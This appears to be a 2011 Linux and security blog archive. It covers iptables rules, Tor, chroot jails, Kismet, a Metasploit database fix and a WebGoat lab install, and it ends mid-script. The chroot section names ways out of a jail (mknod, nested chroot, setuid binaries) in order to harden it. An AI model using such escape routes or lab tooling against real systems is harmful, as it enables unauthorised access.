Saturday, November 12, 2011

Setting Linux Firewall

iptables is the administration tool for IPv4 packet filtering and NAT in the Linux kernel. The options below specify the action to perform; only one of them can be given on a command line unless otherwise stated. For the long versions of the command and option names you only need to type enough letters for iptables to tell the option apart from all the others.

-A, --append chain rule-specification
Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule is added for each possible address combination.
-D, --delete chain rule-specification
-D, --delete chain rulenum
Delete one or more rules from the selected chain. There are two versions of this command: the rule can be specified as a number in the chain (starting at 1 for the first rule) or as a rule to match.
-I, --insert chain [rulenum] rule-specification
Insert one or more rules in the selected chain at the given rule number. So if the rule number is 1, the rule or rules are inserted at the head of the chain. This is also the default if no rule number is specified.
-R, --replace chain rulenum rule-specification
Replace a rule in the selected chain. If the source and/or destination names resolve to multiple addresses, the command fails. Rules are numbered starting at 1.
-L, --list [chain]
List all rules in the selected chain. If no chain is selected, all chains are listed. Like every other iptables command, it applies to the specified table (filter is the default), so NAT rules get listed by
iptables -t nat -n -L
It is often used with the -n option, to avoid long reverse DNS lookups. It is legal to specify the -Z (zero) option as well, in which case the chain(s) are atomically listed and zeroed. The exact output is affected by the other arguments given; the full rules are only shown with
iptables -L -v
Examples:
drop ICMP from a given source address (here 127.0.0.1; -A appends the rule, whereas -D would try to delete an existing matching rule):
   iptables -A INPUT -s 127.0.0.1 -p icmp -j DROP
allow incoming TCP traffic to the web server on port 80:
   iptables -A INPUT -p tcp --dport 80 -j ACCEPT
check the rules (-n skips DNS lookups, -v shows counters and interfaces, --line-numbers shows the rulenum that -D, -I and -R take):
   iptables -L -n -v --line-numbers
flush the rules:
   iptables -F
Note that -F only empties the chains of the filter table; it does not reset the chain policies. On a host whose INPUT policy is DROP a plain flush therefore locks you out, so set the policies back to ACCEPT first (iptables -P INPUT ACCEPT) or run the flush from the console.

Saturday, November 5, 2011

GetGo Download Manager

Free Complete Online Video, Music and File Download Manager with Download Support. This Free Downloader is an Essential Internet Tool for Increasing Download Speed, Resuming, Scheduling, and Organizing Downloads. Easy to use, customizable modern interface allows you to Download All of your favorite videos, program, games, and music with extreme acceleration. With auto-resuming feature, you never have to waste your frustrations on unfinished downloads due to network problems, or unexpected power outages.

Highlights

IE & Firefox Integrated
Seamlessly integrated with IE and Firefox web browsers, GetGo can run in the background without interrupting your web browsing experience while downloading.

Easy Batch Download
You can easily set up a Batch Download that not only downloads a large list of files using an URL pattern template, but also automatically renames downloaded files using a filename pattern template.

Extreme Download Acceleration
GetGo accelerates download speed by splitting files into many blocks and then downloading them concurrently, which can result in an increase in download speed of up to 500%!

Flexible Download Scheduler
With GetGo's flexible download scheduler, you can schedule your downloads to start on timer or a specific date, and to download for a specific amount of time before stopping.

Resume Broken Downloads
GetGo resumes broken or stopped downloads, such that you won't need to restart your downloads from the beginning again, saving your time and bandwidth.

Wednesday, November 2, 2011

Wine windows software emulator


Wine is a free software application that aims to allow computer programs written for Microsoft Windows to run on Unix-like operating systems. Wine also provides a software library, known as Winelib, against which developers can compile Windows applications to help port them to Unix-like systems.
Wine is both an emulator and a compatibility layer. It duplicates functions of a Windows computer by providing alternative implementations of the DLLs that Windows programs call, and a process to substitute for the Windows NT kernel. This method of duplication differs from other methods that might also be considered emulation, where Windows programs run in a virtual machine. Wine is predominantly written using black-box reverse engineering, to avoid copyright issues.
The name Wine initially was an acronym for WINdows Emulator. Its meaning later shifted to the recursive backronym Wine Is Not an Emulator in order to differentiate the software from other emulators. While the name sometimes appears in the forms WINE and wine, the project developers have agreed to standardize on the form Wine.
In a 2007 survey by desktoplinux.com of 38,500 Linux desktop users, 31.5% of respondents reported using Wine to run Windows applications. This plurality was larger than all x86 virtualization programs combined, as well as larger than the 27.9% who reported not running Windows applications.

Malwarebytes Anti-Malware


Malwarebytes Anti-Malware is a surprisingly effective freeware antimalware tool. It's a relatively speedy malware remover, with the quick scan taking about 8 minutes even with other high-resource programs running. The heuristics engine proved on multiple computers during empirical testing that it was capable of determining the difference between false positives and dangerous apps.
The app has some nice features rolled in, too. It supports multiple drive scanning including networked drives, context menu options including a scan-on-demand for individual files, and the FileAssassin option under the More Tools section for removing locked files. The interface is simple, but pleasant-looking and well-organized. Tabs live just below the oversized logo, with few options per tab to keep down the clutter. The installation process was fast enough, but interestingly offered up the well-kept changelog and an instant definition file update.
Do note that the real-time protection is restricted to the paid version, as is the scheduler for updates and scans. Overall, though, Malwarebytes Anti-Malware is a responsive malware remover that does what it should with a minimum of fuss.



reff:download.cnet.com

Iptables

       Iptables is used to set up, maintain, and inspect the tables of IPv4 packet filter rules in the Linux kernel. Several different tables may be defined. Each table contains a number of built-in chains and may also contain user-defined chains.


       Each chain is a list of rules which can match a set of packets.  Each rule specifies what to do with a packet that matches.  This is called a `target', which may be  a  jump  to  a user-defined chain in the same table.


       A firewall rule specifies criteria for a packet and a target. If the packet does not match, the next rule in the chain is examined; if it does match, then the next rule is specified by the value of the target, which can be the name of a user-defined chain or one of the special values ACCEPT, DROP, QUEUE or RETURN.



       ACCEPT means to let the packet through. DROP means to drop the packet on the floor. QUEUE means to pass the packet to userspace. (How the packet can be received by a userspace process differs by the particular queue handler. 2.4.x and 2.6.x kernels up to 2.6.13 include the ip_queue queue handler. Kernels 2.6.14 and later additionally include the nfnetlink_queue queue handler. Packets with a target of QUEUE will be sent to queue number '0' in this case. Please also see the NFQUEUE target as described later in this man page.) RETURN means stop traversing this chain and resume at the next rule in the previous (calling) chain. If the end of a built-in chain is reached or a rule in a built-in chain with target RETURN is matched, the target specified by the chain policy determines the fate of the packet.



Example (the cluster match from the iptables man page: two nodes receive the same packets through a shared multicast MAC address and each keeps only the flows the hash assigns to it; this is node 1's configuration):

              iptables -A PREROUTING -t mangle -i eth1 -m cluster --cluster-total-nodes 2 --cluster-local-node 1 --cluster-hash-seed 0xdeadbeef -j MARK --set-mark 0xffff
              iptables -A PREROUTING -t mangle -i eth2 -m cluster --cluster-total-nodes 2 --cluster-local-node 1 --cluster-hash-seed 0xdeadbeef -j MARK --set-mark 0xffff
              iptables -A PREROUTING -t mangle -i eth1 -m mark ! --mark 0xffff -j DROP
              iptables -A PREROUTING -t mangle -i eth2 -m mark ! --mark 0xffff -j DROP

       And the following commands to make all nodes see the same packets:

              ip maddr add 01:00:5e:00:01:01 dev eth1
              ip maddr add 01:00:5e:00:01:02 dev eth2
              arptables -A OUTPUT -o eth1 --h-length 6 -j mangle --mangle-mac-s 01:00:5e:00:01:01
              arptables -A INPUT -i eth1 --h-length 6 --destination-mac 01:00:5e:00:01:01 -j mangle --mangle-mac-d 00:zz:yy:xx:5a:27
              arptables -A OUTPUT -o eth2 --h-length 6 -j mangle --mangle-mac-s 01:00:5e:00:01:02
              arptables -A INPUT -i eth2 --h-length 6 --destination-mac 01:00:5e:00:01:02 -j mangle --mangle-mac-d 00:zz:yy:xx:5a:27

       (00:zz:yy:xx:5a:27 stands for the node's own MAC address.)

       In the case of TCP connections, the pickup facility has to be disabled to avoid marking TCP ACK packets coming in the reply direction as valid:

              echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose
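As an added example that covers both the basic rules in the "Setting Linux Firewall" post above and the chain traversal described here (jump into a user-defined chain, RETURN back into the calling chain, the chain policy deciding at the end of a built-in chain), this is a minimal stateful host firewall written as a shell function. It is not from the iptables man page or from the earlier post; the admin subnet 192.168.56.0/24 and the SSH port are assumptions. By default it only prints the commands; run it as root with IPT=iptables to apply them.

```shell
#!/bin/sh
# Minimal stateful host firewall for the filter table. Dry run by default:
# the commands are printed, not executed. As root, IPT=iptables sh fw.sh
# applies them. ADMIN_NET and SSH_PORT are assumptions for this example.
IPT="${IPT:-echo iptables}"
ADMIN_NET="${ADMIN_NET:-192.168.56.0/24}"
SSH_PORT="${SSH_PORT:-22}"

fw_rules() {
    # Open the policies before flushing so an SSH session survives a reload;
    # default-deny is set again as the very last step.
    $IPT -P INPUT ACCEPT
    $IPT -P FORWARD ACCEPT
    $IPT -F INPUT
    $IPT -F FORWARD
    $IPT -F MGMT 2>/dev/null || true   # harmless when MGMT does not exist yet
    $IPT -X MGMT 2>/dev/null || true
    $IPT -N MGMT

    # User-defined chain MGMT: accept new SSH from the admin network at a
    # rate that slows down brute forcing, log the rest, then RETURN so the
    # packet continues in INPUT right after the rule that jumped here.
    $IPT -A MGMT -s "$ADMIN_NET" -m conntrack --ctstate NEW \
        -m limit --limit 6/min --limit-burst 6 -j ACCEPT
    $IPT -A MGMT -m limit --limit 3/min -j LOG --log-prefix "fw-ssh-denied: "
    $IPT -A MGMT -j RETURN

    # INPUT: order matters, loopback and existing connections come first.
    $IPT -A INPUT -i lo -j ACCEPT
    $IPT -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    $IPT -A INPUT -m conntrack --ctstate INVALID -j DROP
    $IPT -A INPUT -p tcp --dport "$SSH_PORT" -j MGMT
    $IPT -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
    $IPT -A INPUT -p icmp --icmp-type echo-request -m limit --limit 2/s -j ACCEPT

    # No final DROP rule on purpose: whatever reaches the end of INPUT,
    # including SSH that RETURNed from MGMT, is decided by the chain policy.
    $IPT -P INPUT DROP
    $IPT -P FORWARD DROP
}

# Number of INPUT rules the run would add, for a quick sanity check.
fw_rule_count() { fw_rules | grep -c -- ' -A INPUT '; }

fw_rules
```

SSH from outside ADMIN_NET takes exactly the path the man page text describes: it jumps into MGMT, is logged, RETURNs to INPUT at the rule after the jump, matches nothing else and meets the INPUT policy, DROP. Setting the policies to DROP last means a reload over SSH is never cut off while the chain is still empty.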

Fix Metasploit Error After Update

If you see this error:
root@bt:~# msfconsole 
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "127.0.0.1" and accepting
        TCP/IP connections on port 7175?
 {"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"259959f7", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `connect'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:217:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `postgresql_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:223:in `new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:245:in `checkout_new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:188:in `block (2 levels) in checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `loop'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `block in checkout'", "/opt/framework/ruby/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:183:in `checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:98:in `connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:326:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:123:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:115:in `connection'", 
"/opt/framework/msf3/lib/active_record/base.rb:1271:in `columns'", "/opt/framework/msf3/lib/active_record/base.rb:1284:in `column_names'", "/opt/framework/msf3/lib/active_record/base.rb:1297:in `column_methods_hash'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `block in all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `each'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1842:in `method_missing'", "/opt/framework/msf3/lib/msf/core/model/workspace.rb:69:in `default'", "/opt/framework/msf3/lib/msf/core/db.rb:189:in `default_workspace'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:161:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:190:in `initialize'", "/opt/framework/msf3/msfconsole:130:in `new'", "/opt/framework/msf3/msfconsole:130:in `<main>'"]

don't panic; the database itself is fine. PostgreSQL usually refuses to start like this because a previous instance left its pid file and Unix socket behind (a crash, or an update that killed the server without a clean shutdown), so the fix is to remove those stale files and start the server again:
 rm /opt/framework/postgresql/data/postmaster.pid 
 rm /opt/framework/postgresql/.s.PGSQL.7175
 rm /opt/framework/postgresql/.s.PGSQL.7175.lock
 /etc/init.d/framework-postgres start 
Only do this when no postgres process is actually running (check with ps aux | grep postgres first): removing postmaster.pid from under a live server lets a second one start on the same data directory and corrupt it.
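The same fix with that check built in, as an added example that is not part of Metasploit or BackTrack: the files are only removed when the PID recorded in postmaster.pid is really gone. The paths and port default to the ones in the post.

```shell
#!/bin/sh
# Remove PostgreSQL's stale pid, socket and lock files only when the
# postmaster they belong to is really gone. Paths default to the BackTrack
# Metasploit layout from the post; override PGDATA/PGSOCKDIR/PGPORT elsewhere.
PGDATA="${PGDATA:-/opt/framework/postgresql/data}"
PGSOCKDIR="${PGSOCKDIR:-/opt/framework/postgresql}"
PGPORT="${PGPORT:-7175}"

# 0 if postmaster.pid names a live process, 1 if the file is absent or stale.
# kill -0 needs the same privileges as the server (root in this post).
pg_is_running() {
    pidfile="$1/postmaster.pid"
    [ -r "$pidfile" ] || return 1
    pid=$(head -n 1 "$pidfile" | tr -dc '0-9')   # first line is the PID
    [ -n "$pid" ] && kill -0 "$pid" 2>/dev/null
}

# Removes the stale files. Returns 0 after cleanup (or when there was
# nothing to clean), 2 if a live server was found and nothing was touched.
pg_clean_stale() {
    data="$1"; sockdir="$2"; port="$3"
    if pg_is_running "$data"; then
        echo "postmaster pid $(head -n 1 "$data/postmaster.pid") is alive; refusing to remove its files" >&2
        return 2
    fi
    rm -f "$data/postmaster.pid" "$sockdir/.s.PGSQL.$port" "$sockdir/.s.PGSQL.$port.lock"
}

# Usage (as root): sh fix-msf-postgres.sh run
if [ "${1:-}" = "run" ]; then
    pg_clean_stale "$PGDATA" "$PGSOCKDIR" "$PGPORT" && /etc/init.d/framework-postgres start
fi
```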

After that, open msfconsole :
root@bt:~# msfconsole 
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.1.2-dev [core:4.1 api:1.0]
+ -- --=[ 755 exploits - 397 auxiliary - 109 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14141 updated today (2011.11.02)

our Metasploit has been fixed.
Good luck!!

Tuesday, November 1, 2011

Crossover, windows emulator for linux

CrossOver allows you to install many Windows applications on a Linux operating system. You can think of it as an emulator, but it's different, because there's no Windows OS license required. Your applications integrate seamlessly in OS X or Linux; just click and run. No rebooting, no switching to a virtual machine, and no Windows operating system license required!
Adding new Windows software is easy. Just place your install CD in your machine, and CrossOver will recognize it and offer to install it. Once installed, CrossOver will configure your application to run on your computer. That's all there is to it.
CrossOver is capable of running a range of Windows software. To see if your favorite application is supported, check the CrossOver Compatibility Center.

Gparted tool partition


Setting Gparted :
  1. Download the GParted Live zip file.
  2. If you already have a FAT16 or FAT32 partition on your USB flash drive then skip to the next step (3).
    Otherwise prepare at least a 200 MB partition formatted with either a FAT16 or FAT32 file system.
    If the USB flash drive or USB hard drive does not have any partition, you can use a partitioning tool (e.g. gparted, parted, fdisk, cfdisk or sfdisk) to create a partition with a size of 200 MB or more.
    Here we assume your USB flash drive or USB hard drive is /dev/sdd (you have to confirm your device name, since it's _NOT_ always /dev/sdd) on your GNU/Linux, so the partition table looks like:
    # fdisk -l /dev/sdd
          Disk /dev/sdd: 12.8 GB, 12884901888 bytes
          15 heads, 63 sectors/track, 26630 cylinders
          Units = cylinders of 945 * 512 = 483840 bytes
          Disk identifier: 0x000c2aa7
    
             Device Boot      Start         End      Blocks   Id  System
             /dev/sdd1   *           1       26630    12582643+   b  W95 FAT32
        
    Then format the partition as FAT with a command such as "mkfs.vfat -F 32 /dev/sdd1"
    WARNING! Executing the mkfs.vfat command on the wrong partition or device could cause your GNU/Linux not to boot. Be sure to confirm the command before you run it.
    # mkfs.vfat -F 32 /dev/sdd1
          mkfs.vfat 2.11 (12 Mar 2005)
        
  3. Insert your USB flash drive or USB hard drive into the USB port on your Linux machine and wait a few seconds. Next, run the command "dmesg" to query the device name of the USB flash drive or USB hard drive. Let's say, for example, that you find it is /dev/sdd1. In this example, we assume /dev/sdd1 has FAT filesystem, and it is automatically mounted in dir /media/usb/. If it's not automatically mounted, manually mount it with commands such as "mkdir -p /media/usb; mount /dev/sdd1 /media/usb/".
  4. Unzip all the files and copy them into your USB flash drive or USB hard drive. You can do this with a command such as: "unzip gparted-live-0.4.5-2.zip -d /media/usb/"). Keep the directory architecture, for example, file "COPYING" should be in the USB flash drive or USB hard drive's top directory (e.g. /media/usb/COPYING).
  5. To make your USB flash drive bootable, first change the working dir, e.g. "cd /media/usb/utils/linux", then run "bash makeboot.sh /dev/sdd1" (replace /dev/sdd1 with your USB flash drive device name), and follow the prompts.
    WARNING! Executing makeboot.sh with the wrong device name could cause your GNU/Linux not to boot. Be sure to confirm the command before you run it.

    NOTE: There is a known problem if you run makeboot.sh on Debian Etch, since the program utils/linux/syslinux does not work properly. Make sure you run it on newer GNU/Linux, such as Debian Lenny, Ubuntu 8.04, or Fedora 9

Tor (anonymity network)

Tor (short for The Onion Router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from someone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", to the user. It is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored. "Onion routing" refers to the layered nature of the encryption service: the original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and ultimately the destination. This reduces the possibility of the original data being unscrambled or understood in transit. The software is free software and the network is free of charge to use.
Operation

Tor aims to conceal its users' identities and their network activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers throughout the globe. These onion routers employ encryption in a multi-layered manner (hence the onion metaphor) to ensure perfect forward secrecy between relays, thereby providing users with anonymity in network location. That anonymity extends to the hosting of censorship-resistant content via Tor's anonymous hidden service feature. By keeping some of the entry relays secret (bridge relays), users can evade Internet censorship that relies upon blocking public Tor relays.
Because the internet address of the sender and the recipient are not both in cleartext at any hop along the way (and at middle relays neither piece of information is in cleartext), someone eavesdropping at any point along the communication channel cannot directly identify both ends. Furthermore, to the recipient it appears that the last Tor node (exit relay) is the originator of the communication rather than the sender.

Originating traffic
Users of a Tor network run an onion proxy on their machine. The Tor software periodically negotiates a virtual circuit through the Tor network, using multi-layer encryption, ensuring perfect forward secrecy. At the same time, the onion proxy software presents a SOCKS interface to its clients. SOCKS-aware applications may be pointed at Tor, which then multiplexes the traffic through a Tor virtual circuit. The Polipo proxy server can speak the SOCKS 4 and SOCKS 5 protocols and is therefore recommended for use together with the Tor anonymising network. Polipo is a web proxy that does HTTP 1.1 pipelining well, so it can reduce the latency of browsing over Tor.
Once inside a Tor network, the traffic is sent from router to router, ultimately reaching an exit node at which point the cleartext packet is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node. The exit node consequently sees, and can tamper with, everything that is not end-to-end encrypted (plain HTTP, for instance): Tor hides where the traffic comes from, not what it contains.
Tor's application independence sets it apart from most other anonymity networks: it works at the Transmission Control Protocol (TCP) stream level. Applications whose traffic is commonly anonymised using Tor include Internet Relay Chat (IRC), instant messaging and World Wide Web browsing. When browsing the Web, Tor is often coupled with Polipo or Privoxy proxy servers. Privoxy is a filtering proxy server that aims to add privacy at the application layer. Polipo can speak the SOCKS protocol and does HTTP 1.1 pipelining to reduce latency, and is therefore now recommended by torproject.org for use together with the Tor anonymising network.
On older versions of Tor (resolved May–July 2010), as with many anonymous web surfing systems, direct Domain Name System (DNS) requests were still performed by many applications without going through the Tor proxy. This allows someone monitoring a user's connection to determine (for example) which websites they are viewing through Tor, even though they cannot see the content being viewed. Using Privoxy or the torify command included with a Tor distribution is one solution to this problem. Additionally, applications using SOCKS5, which supports name-based proxy requests, can route DNS requests through Tor, having lookups performed at the exit node and thus receiving the same anonymity as other Tor traffic. The application has to be told to resolve remotely, though: curl, for example, only does so with --socks5-hostname (or a socks5h:// proxy URL); with plain --socks5 it resolves the name locally and leaks it.
As of Tor release 0.2.0.1-alpha, Tor includes its own DNS resolver which dispatches queries through the Tor network. This closes the DNS leak and can interact with Tor's address mapping facilities to provide Tor hidden service (.onion) access to non-SOCKS-aware applications.

reff:ww.en.wikipedia.org

The power of "chroot"

chroot is a way of isolating applications from the rest of your computer by putting them in a jail: a process started with chroot sees the given directory as its root and cannot open paths outside it. This is particularly useful if you are testing an application which could potentially alter important system files, or which may be insecure. Keep in mind that chroot is a filesystem view, not a full sandbox: a process running as root inside the chroot can still get out (with mknod, or a nested chroot), so run the jailed program as an unprivileged user, and remember that bind mounts like /proc and a shared X display give it a window back onto the host.


Creating a chroot

This section provides instructions on creating a basic chroot. For more advanced chroots.
  1. Install the dchroot and debootstrap packages.
  2. As an administrator (i.e. using sudo), create a new directory for the chroot. In this procedure, the directory /var/chroot will be used. To do this, type sudo mkdir /var/chroot into a command line.
  3. As an administrator, open /etc/schroot/schroot.conf in a text editor. Type cd /etc/schroot, followed by gksu gedit schroot.conf. This will allow you to edit the file.
  4. Add the following lines into schroot.conf and then save and close the file. Replace your_username with your username.
    • [lucid]
      description=Ubuntu Lucid
      location=/var/chroot
      priority=3
      users=your_username
      groups=sbuild
      root-groups=root
  5. Open a terminal and type:
    • sudo debootstrap --variant=buildd --arch i386 lucid /var/chroot/ http://mirror.url.com/ubuntu/
    This will create a basic 'installation' of Ubuntu 10.04 (Lucid Lynx) in the chroot. It may take a while for the packages to be downloaded.
    Note: You can replace lucid with the Ubuntu version of your choice.
    Note: You must change the above mirror.url.com with the URL of a valid archive mirror local to you.
  6. A basic chroot should now have been created. Type sudo chroot /var/chroot to change to a root shell inside the chroot.

Setting-up the chroot


There are some basic steps you can take to set-up the chroot, providing facilities such as DNS resolution and access to /proc.
Note: Type these commands in a shell which is outside the chroot.
  1. Type the following to mount the /proc filesystem in the chroot (required for managing processes):
    • sudo mount -o bind /proc /var/chroot/proc
  2. Type the following to allow DNS resolution from within the chroot (required for Internet access):
    • sudo cp /etc/resolv.conf /var/chroot/etc/resolv.conf
Very few packages are installed by default in a chroot (even sudo isn't installed). Use apt-get install package_name to install packages.
See Debootstrap Chroot and Installing Mandriva Linux in a Chroot for more advanced set-up instructions.
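An added helper script for the chroot built above, not from the Ubuntu documentation the post quotes: chroot_audit lists what would let a user inside the jail get back out (setuid/setgid binaries and device nodes), and chroot_run does the /proc and resolv.conf setup from steps 1 and 2, enters the chroot as an unprivileged user and unmounts /proc again on exit. /var/chroot and the uid:gid are assumptions.

```shell
#!/bin/sh
# chroot_audit: what makes a chroot escapable from inside. A local root in
# a setuid binary, or a device node for a disk or /dev/mem, turns "jailed"
# into "root on the host". chroot_run: the post's setup steps plus a drop
# of privileges. Added example; /var/chroot and 1000:1000 are assumptions.

chroot_audit() {
    root="$1"
    # -xdev keeps find out of bind mounts such as /proc.
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null \
        | sed 's|^|setuid/setgid: |'
    find "$root" -xdev \( -type b -o -type c \) -print 2>/dev/null \
        | sed 's|^|device node: |'
}

# Number of findings, for scripting (0 means nothing suspicious).
chroot_audit_count() { chroot_audit "$1" | wc -l | tr -d ' '; }

# Usage (as root): chroot_run /var/chroot 1000:1000 /bin/bash
chroot_run() {
    root="$1"; user="$2"; shift 2
    mount -o bind /proc "$root/proc"
    trap 'umount "$root/proc" 2>/dev/null' EXIT   # undo the bind mount on exit
    cp /etc/resolv.conf "$root/etc/resolv.conf"
    # --userspec (GNU coreutils chroot) drops to uid:gid before the command
    # runs; a plain user cannot chroot() its way back out, root can.
    chroot --userspec="$user" "$root" "$@"
}

# Usage: sh chroot-tools.sh audit [/var/chroot]
if [ "${1:-}" = "audit" ]; then
    chroot_audit "${2:-/var/chroot}"
fi
```

Run chroot_audit after every apt-get install inside the jail: the Debian base system alone ships several setuid binaries (su, passwd, mount), and a local root in any of them makes the chroot a root shell from which the usual escapes work. Keep the jail free of device nodes for the same reason.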

Accessing graphical applications inside the chroot


You can run graphical applications within a chroot, but you need to provide an X server for them to run in first. The easiest way to do this is to set the display of the chroot system to be identical to the root display of your system's main X server.
In other words, in the chroot shell type
export DISPLAY=:0.0

Any X command you type will now get its own window as you're used to, as long as the X server's Unix socket (/tmp/.X11-unix) and your ~/.Xauthority cookie are visible inside the chroot (bind-mount /tmp/.X11-unix into it, or let the server accept TCP connections). As the program runs inside the chroot jail it will not be able to see your normal file system, but it does share your X display with everything else on it.
You don't have to enter the chroot shell to run its commands. Suppose you want to run Firefox in a chroot jail in order to avoid security problems with signed Java applets and other components which otherwise would have access to your personal files. You can do this by running the command (1000:1000 being your own uid:gid; --userspec drops root before Firefox starts, since a browser running as root inside the jail can break out of it)
gksudo chroot --userspec=1000:1000 /var/chroot env DISPLAY=:0.0 firefox

This command can also be invoked from the menu, or a panel applet or desktop shortcut.
If you want the chroot to have its own display, you need to create this display with the Xnest command. Perform the following instructions outside the chroot:
  1. Install the xhost and xnest packages.
  2. Ensure that /proc is mounted and DNS resolution is set-up within the chroot (see above).
  3. Type the following into a Terminal:
    • Xnest -ac :1
    A blank Xnest window should appear.
  4. Open another Terminal and type the following to enter the chroot:
    • sudo chroot /var/chroot
  5. While in the chroot shell, type the following:
    • export DISPLAY=localhost:1
      If you have problems starting graphical applications, type the above command again, but replace localhost with 127.0.0.1
  6. Start a window manager inside the chroot. For example, install the metacity package and type:
    • metacity &
  7. Start a graphical application inside the chroot (making sure that you installed it in the chroot first). It should appear in the Xnest window.
You can install a complete Ubuntu desktop in the chroot by installing the ubuntu-desktop package. GNOME can be started from the command line by running the gnome-session command.

Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet works with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, aside from external drones, only one wireless card is supported as a packet source there.


Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.
Kismet has the ability to log all sniffed packets and save them in a tcpdump/Wireshark or AirSnort compatible file format. Kismet also captures PPI headers.
Kismet also has the ability to detect default or "not configured" networks, probe requests, and determine what level of wireless encryption is used on a given access point.
To find as many networks as possible, Kismet supports channel hopping. This means that it constantly changes from channel to channel non-sequentially, in a user-defined sequence with a default value that leaves big gaps between consecutive channels (for example 1-6-11-2-7-12-3-8-13-4-9-14-5-10). The advantage of this method is that it captures more packets, because adjacent channels overlap.
Kismet also supports logging of the geographical coordinates of the network if the input from a GPS receiver is additionally available.

Sunday, October 30, 2011

How to install webgoat in backtrack

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

1. Before installing, first download WebGoat from this link.
2. The archive is in 7zip format; install p7zip to extract it:
    apt-get install p7zip
3. Now extract the WebGoat archive:
    p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z
4. When the extraction has completed, go into the extracted folder:
    cd WebGoat-OWASP_Standard-5.3_RC1
5. Make webgoat.sh executable with this command:
    chmod +x webgoat.sh
6. WebGoat needs the OpenJDK 6 JRE and JDK to run; get them with the following command:
    apt-get install openjdk-6-jre openjdk-6-jdk
7. After the installation WebGoat is ready to run on port 80 or 8080 with one of these commands:
    ./webgoat.sh start80
    ./webgoat.sh start8080


Now we can open WebGoat in the browser at http://127.0.0.1/webgoat/attack (or http://127.0.0.1:8080/webgoat/attack when started with start8080). WebGoat is deliberately vulnerable, so keep it reachable from localhost or an isolated lab network only: anyone who can reach it gets the same SQL injection and command execution lessons you do.
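An added example, not part of WebGoat, for checking that the lab server is only listening on loopback: it reads the listener table from ss -ltn (or netstat -ltn) on standard input, so it also works on a saved copy; the port numbers are the ones the post uses.

```shell
#!/bin/sh
# Reports sockets listening on PORT that are bound to something other than
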